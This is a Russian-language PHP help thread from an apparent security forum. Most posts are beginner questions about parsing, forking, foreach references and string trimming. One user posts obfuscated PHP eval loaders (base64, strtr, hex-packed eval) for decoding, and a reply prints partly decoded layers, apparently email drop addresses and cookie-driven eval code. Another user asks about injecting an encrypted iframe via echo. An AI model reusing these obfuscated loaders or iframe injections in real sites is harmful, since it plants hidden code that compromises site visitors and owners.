[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. CE/l/lEP

    CE/l/lEP New Member

    Joined:
    13 Dec 2011
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Для парсинга используй multi_curl а так в php многопоточности как таковой нет, придеться изобретать велосипеды, проще на другом языке такие задачи решать.
     
  2. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Can someone help me decrypt this?

    It's base64 + PHP, giving me problems.

    <?php $_F=__FILE__;$_X='Pz48Pw0KJElXUCA9ICc1Z3lfc3A0ZDVyc0B5MWgyMi5jMm0sMWRtNG5AdDIybHpkYi5jMm0sNWd5X3NwNGQ1cnNAaDJ0bTE0bC5jMm0nOw0KPz4=';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>


    OR

    Code:
    http://pastebin.com/SzWFjRHi
    Thanks
     
  3. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    And also this..


    <?php $_F=__FILE__;$_X='Pz48P3BocCAkX0Y9X19GSUxFX187JF9YPSdQenU4UHcwS0lEUjNZYXd6WkRVZ0p5dXZOV2RpY29BMFpEVnlMbkIyY0NjN0RRMmtTVkFnUFNCd01XTnJLQ0pJSzRJc0lITXpZbk4wYzRna1EwOVBTMGxGWDZaQlVsTTlaalJzTlY5bk5YUmZZekozZERWM2RITTJJalZ5Y2pKeVhhd3laelIzTG1oMGJXdzRLU3h6ZEhKd01uTTJKRU5QVDB0SlJWOVdRVkpUTENBNE56Z29JNGtyYnl4cE1Da3BPdzBLTlhZeGJDaHdNV05yS0NKSUs0SXNJQ0psWkdVYVpUbGxZYUV1WVdGbDFXVW9OemxwWmpkdk56QmxPV1Y2Wldrb1lUZHZkVEFvT1dWa1pUWmxPV1ZqWVRWbGJhVm1aV1JoWWFVYVpYVmxaR1VpWlRWNk1EZDZaV1psWm1Wak56RmxkV1ZoWVRWbGJhVm1aV1JoWVdGallYVW9iemRwWldGbE1XVnBaVzhvZFdGallYVmxaR1ZwTmE4b2JhVWFaVGRsMVdGallYVmxPR1ZwWlRabGRXVnBOYUVvYmFFaWJhSTRLU2s3RFEya2NvUnlQVEZ5Y2pGaUtDUnpOV2lrTENBa1NWQXBPeUJtTW5JNk1XTjJJQ2drY29SeUlERnpJQ1J6Tldpa0tRMEtQenU9Jzs1djFsKGIxczVldV9kNWMyZDUoJ0pGOVlQV0poY2FVYU5GOWtaV052WkdVMkpGOVlLVHNrWDZnOWNvUnlkSEkySkY5WUxDY3hNak0wTlRaaGJvVnBaU2NzSmFGdmRXbGxNVEl6TkRVYUp5azdKRjlTUFdWeVpXZGZjbVZ3YkdGalpTZ25YNjlHU1V4Rlg2OG5MQ0luSTR1a1gwWTNJNGM0TENSZldDazdaWFpoYkNna1g2SXBPeVJmVWowd095UmZXRDB3T3c9PScpKTs/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

    Thank you very much.
     
  4. Katsuro

    Katsuro Member

    Joined:
    26 May 2009
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    Где то видал скрипт Парсинга обсуждений в контакте, с последующим постингом в phpbb3. Кто может дать ссылочку на скрипт? или помочь написать?
     
  5. bad_boy

    bad_boy Elder - Старейшина

    Joined:
    30 Dec 2004
    Messages:
    189
    Likes Received:
    33
    Reputations:
    3
    Никогда не пользовался, но есть такое расширение как PCNTL, там есть функция pcntl_fork, аналогичная линуксовской fork. В винде не робит.
     
    1 person likes this.
  6. CE/l/lEP

    CE/l/lEP New Member

    Joined:
    13 Dec 2011
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Yes, of course :)

    PHP:
    $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;


    ?><?
    $IWP = '5gy_sp4d5rs@y1h22.c2m,1dm4n@t22lzdb.c2m,5gy_sp4d5rs@h2tm14l.c2m';
    ?>

    PHP:

    ?><?php $_F=__FILE__;$_X='Pzu8Pw0KIDR3YawzZDUgJyuvNWdicoA0ZDVyLnB2cCc7DQ2kSVAgPSBwMWNrKCJIK4IsIHMzYnN0c4gkQ09PS0lFX6ZBUlM9ZjRsNV9nNXRfYzJ3dDV3dHM2IjVycjJyXawyZzR3Lmh0bWw4KSxzdHJwMnM2JENPT0tJRV9WQVJTLCA4NzgoI4krbyxpMCkpOw0KNXYxbChwMWNrKCJIK4IsICJlZGUaZTllYaEuYWFl1WUoNzlpZjdvNzBlOWV6ZWkoYTdvdTAoOWVkZTZlOWVjYTVlbaVmZWRhYaUaZXVlZGUiZTV6MDd6ZWZlZmVjNzFldWVhYTVlbaVmZWRhYWFjYXUobzdpZWFlMWVpZW8odWFjYXVlZGVpNa8obaUaZTdl1WFjYXVlOGVpZTZldWVpNaEobaEibaI4KSk7DQ2kcoRyPTFycjFiKCRzNWikLCAkSVApOyBmMnI6MWN2ICgkcoRyIDFzICRzNWikKQ0KPzu=';5v1l(b1s5eu_d5c2d5('JF9YPWJhcaUaNF9kZWNvZGU2JF9YKTskX6g9coRydHI2JF9YLCcxMjM0NTZhboVpZScsJaFvdWllMTIzNDUaJyk7JF9SPWVyZWdfcmVwbGFjZSgnX69GSUxFX68nLCInI4ukX0Y3I4c4LCRfWCk7ZXZhbCgkX6IpOyRfUj0wOyRfWD0wOw=='));?>

    $_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

     
  7. trol.trololo

    trol.trololo New Member

    Joined:
    11 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте... вопрос такой... есть код iframe... вставляю в php через echo - все работает..., а вставляю его криптовоанным (также через echo <script...и.т.д) - не работает.... при этом, ели криптованный код вставить в HTML - все работает... вопрос - почему??
     
  8. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Подробнее, как, чем криптуеш?
     
  9. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    есть txt файл:
    Код:
    PHP:
    $psw array_unique(file('psw.txt'));
    foreach (
    $psw as &$_lp$_lp rtrim($_lp);
    var_dump($psw);
    Output:

    array(2) {
    [0]=>
    string(4) "abcd"
    [1]=>
    &string(4) "dbca"
    }
    Почему там амперсанд появился и только в последнем элементе всегда появляется?
     
  10. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    При изпользовании амперсанда функция получит не копию передаваемой переменной, а ее оригинал. Т.е. при изменении переменной это отразится на области памяти места, откуда вызвали функцию.

    Достаточно убрать его из второй строки.
     
  11. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    Ну я бы не стал его туда пихать, если бы не знал, что он значит. Интересует почему только в последнем элементы тип &string, логично предположить, что у всех должен быть тип &string. Да и вообще я не понимаю почему он там, я ведь не делал массив ссылок.
     
  12. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Переменные с амперсандом берутся по ссылке, а без него - по значению.
     
  13. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    AnGeI амперсанд в массиве указывает что на данный элемент существует ссылка еще где-то, кроме самого массива.
    PHP:
    $psw = array('1',"2\r\n","3\r\n",'4');//array_unique(file('psw.txt'));
    foreach ($psw as &$_lp
    {
        
    $_lp rtrim($_lp);
        
    var_dump($psw); // Амперсанд указывает на текущий элемент, т.к. в $_lp существует ссылка на него
    }
    Если делать unset() то амперсанд "пропадет":
    PHP:
    $psw = array('1',"2\r\n","3\r\n",'4');//array_unique(file('psw.txt'));
    foreach ($psw as &$_lp
    {
        
    $_lp rtrim($_lp);
        unset(
    $_lp); // unset()
        
    var_dump($psw);
    }
    Ну и просто куча ссылок на элементы:
    PHP:
    $arr = array(1,2,3,4,5,6);
    var_dump($arr);
    $link1 = &$arr[0];
    var_dump($arr);
    $link2 = &$arr[1];
    var_dump($arr);
    Суть - не обращайте внимание.
     
    _________________________
    4 people like this.
  14. Katsuro

    Katsuro Member

    Joined:
    26 May 2009
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    В пхп новичок. Обьясните пожалуйста про вложенные условия if и else, на примере 3 переменных с числами.
     
  15. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,997
    Likes Received:
    899
    Reputations:
    198
    Книгу почитайте, раздел для помощи а не для обучения.
     
    _________________________
    1 person likes this.
  16. хамзин

    хамзин New Member

    Joined:
    24 Dec 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    народ помогите пожалуйста, вроде все просто но вот уже несколько часов сижу.
    нужно из полученного текста последней переменной $result удалить все пробелы.

    <?php
    $sob = $_POST['sob'];
    $tem = $_POST['tem'];
    $hh1 = "window=";
    $hh2 = "&subject=";
    $hh3 = "&message=";
    $hh4 = "\");";
    $result = '';
    foreach(explode("\n",$_POST['Login'])as$line)
    $result.= "$hh1 {$line} $hh2 $tem $hh3 $sob $hh4<br>\n";
    print "$result";
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    trim($result);
     
    _________________________
  18. хамзин

    хамзин New Member

    Joined:
    24 Dec 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    <?php
    $sob = $_POST['sob'];
    $tem = $_POST['tem'];
    $hh1 = "window=";
    $hh2 = "&subject=";
    $hh3 = "&message=";
    $hh4 = "\");";
    $result = '';
    foreach(explode("\n",$_POST['Login'])as$line)
    $result.= "$hh1 {$line} $hh2 $tem $hh3 $sob $hh4<br>\n";
    trim($result);
    print "$result";
    ?>
    ВСЕ ТОЖЕ САМОЕ
     
  19. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    520
    Likes Received:
    90
    Reputations:
    37
    Эта функция удалит пробелы из начала и конца строки.
    А ему надо все.


    PHP:
    <?php
    $sob 
    $_POST['sob'];
    $tem $_POST['tem'];
    $hh1 "window=";
    $hh2 "&subject=";
    $hh3 "&message=";
    $hh4 "\");";
    $result '';
    foreach(
    explode("\n",$_POST['Login'])as$line)
    $result.= "$hh1 {$line} $hh2 $tem $hh3 $sob $hh4<br>\n";
    $result str_replace(" ",""$result);
    print 
    "$result";
    ?>
     
  20. хамзин

    хамзин New Member

    Joined:
    24 Dec 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    так уже пытался, результат тот же.
    дело в том что я $_POST['Login'] передаю не одну строку а список.
    вот что получается:
    window=вася &subject=2222&message=3333");
    window=петя &subject=2222&message=3333");
    window=дима &subject=2222&message=3333");
    window=вова&subject=2222&message=3333");
    Пробелы после каждого слова из списка остаются.
     
    #19740 хамзин, 28 Dec 2011
    Last edited: 28 Dec 2011
Loading...
Thread Status:
Not open for further replies.